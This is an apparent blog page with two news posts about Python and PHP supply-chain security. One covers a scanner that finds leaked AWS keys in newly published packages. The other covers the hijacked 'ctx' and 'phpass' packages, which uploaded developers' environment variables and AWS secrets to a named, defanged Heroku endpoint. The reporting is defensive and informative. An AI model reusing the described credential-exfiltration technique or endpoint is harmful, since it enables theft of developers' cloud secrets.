Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label AWS Keys. Show all posts

PyPl Hosting Malware and AWS Keys 

 

The Python package repository PyPI was discovered to be hosting malware and AWS keys. Tom Forbes, a software developer, created a Rust-based application that searched all new PyPI packages for AWS API keys. The tool returned 57 successful results, some from Louisiana University, Stanford, Portland, Amazon, Intel, and Stanford.

Forbes explains that his scanner searches for AWS keys in fresh releases from PyPI, HexPM, and RubyGems on a recurring basis using GitHub Actions. If it does, it creates a report containing the pertinent information and commits it to the AWS-cred-scanner repository.

According to Forbes' article, "The report comprises the keys that have been found, as well as public link to the keys and additional metadata regarding the release." Github's Secret Scanning service engages because these keys have been uploaded to a public GitHub repository, alerting AWS that the keys have been compromised.

As per Forbes, "It relies on the specific rights granted to the key itself. Other keys I discovered in PyPI were root keys, which are equally permitted to perform any action. The key I discovered that was leaked by InfoSys in November had full admin access, meaning it can do anything. If these keys were stolen, an attacker would have unrestricted access to the associated AWS account."

He claimed that other keys might have more circumscribed but nonetheless excessive permissions. For instance, he claimed it frequently happens that a key meant to grant access to just one AWS S3 storage bucket has unintentionally been configured to give access to every S3 bucket connected to that account.

GitHub's automated key scanning, which includes keys in npm packages, is cited by Forbes as an effective tool. Expressions that GitHub employs to search for secrets are sensitive and cannot be made public. As a result, PyPI and other third parties are basically unable to leverage this decent infrastructure without providing all of the PyPI-published code to GitHub. Further, Forbes recommended that businesses carefully consider their security procedures.

Cybersecurity firm Phylum reported that it uncovered a remote access trojan dubbed pyrologin in a PyPI package in December. Last month, ReversingLabs, another security company, also discovered a malicious PyPI package: the malware was disguising itself as an SDK from SentinelOne, a different security company. And in November, W4SP malware was discovered in dozens of recently released PyPI packages.3,653 harmful code blocks were eliminated as a result of a large-scale malware culling carried out by PyPI in March 2021. 

As a result, AWS creates a support ticket to alert the guilty developer and implements a quarantine policy to reduce the risk of key misuse. However, the issue is that an unethical person might produce comparable scanning software with the intention of abusing and exploiting others. 


Popular Python and PHP LIbraries Hijacked to Steal AWS Keys

 

A software supply chain assault has compromised the PyPI module 'ctx,' which is downloaded over 20,000 times per week, with malicious versions collecting the developer's environment variables. The threat actor even replaced older, secure versions of 'ctx' with code that gathers secrets like Amazon AWS keys and credentials by exfiltrating the developer's environment variables. 

In addition, versions of a 'phpass' fork released to the PHP/Composer package repository Packagist had been modified in a similar way to steal secrets. Over the course of its existence, the PHPass framework has had over 2.5 million downloads from the Packagist repository—though malicious variants are thought to have received significantly fewer downloads. 

The widely used PyPI package 'ctx' was hacked earlier this month, with newer released versions leaking environment variables to an external server. 'ctx' is a small Python module that allows programmers to manipulate dictionary ('dict') objects in various ways. Despite its popularity, the package's developer had not touched it since 2014, according to BleepingComputer. Newer versions, which were released between May 15th and this week, contained dangerous malware. 

The corrupted 'ctx' package was initially discovered by Reddit user jimtk. Somdev Sangwan, an ethical hacker, also revealed that the PHP package 'phpass' had been infiltrated, with tainted copies of the library taking developers' AWS secret keys. Although the malicious 'ctx' versions have been removed from PyPI, copies acquired from Sonatype's malware archives show the presence of harmful code in all 'ctx' versions. 

It's also worth noting that the 0.1.2 version, which hadn't been updated since 2014, was replaced this week with a malicious payload. Once installed, these versions gather all your environment variables and upload these values to the following Heroku endpoint: https://anti-theft-web.herokuapp[.]com/hacked/. At the time of analysis, the endpoint was no longer active. 

In a similar attack, the fork of 'hautelook/phpass,' a hugely popular Composer/PHP package, was hacked with malicious versions released to the Packagist repository. PHPass is an open-source password hashing framework that may be used in PHP applications by developers. The framework was first released in 2005 and has since been downloaded over 2.5 million times on Packagist. 

This week, BleepingComputer discovered malicious commits to the PHPass project that stole environment variables in the same way. The modified 'PasswordHash.php' file in PHPass looks for the values 'AWS ACCESS KEY' and 'AWS SECRET KEY' in your environment. Following that, the secrets are uploaded to the same Heroku endpoint. The presence of similar functionality and Heroku endpoints in both the PyPI and PHP packages suggests that both hijacks were perpetrated by the same threat actor. 

According to the researchers, the attacker's identity is evident. However, this could have been a proof-of-concept experiment gone wrong, and it would be irresponsible to name the individual behind the 'ctx' and 'phpass' hijack until additional information becomes available. Furthermore, while the malicious PyPI package 'ctx' remained active until later today, the impact of malicious 'PHPass' versions appears to have been far more limited after Packagist co-founder Jordi Boggiano marked the hijacked repository as "abandoned" and advised everyone to use bordoni/phpass instead. 

The hijacking of PyPI package 'ctx' is said to have been caused by a maintainer account compromise, but the true cause has yet to be discovered. The attacker claiming a previously abandoned GitHub repository and reviving it to publish altered 'phpass' versions to the Packagist registry has been ascribed to the hack of hautepass/phpass. 

Security Innovation, a cybersecurity organisation, previously dubbed this type of attack "repo jacking." Intezer and Checkmarx recently produced a joint study based on this research and how it can affect Go projects, termed it "chainjacking." This hijacking comes on the back of a PyPI typosquat being detected deploying backdoors on Windows, Linux, and Macs.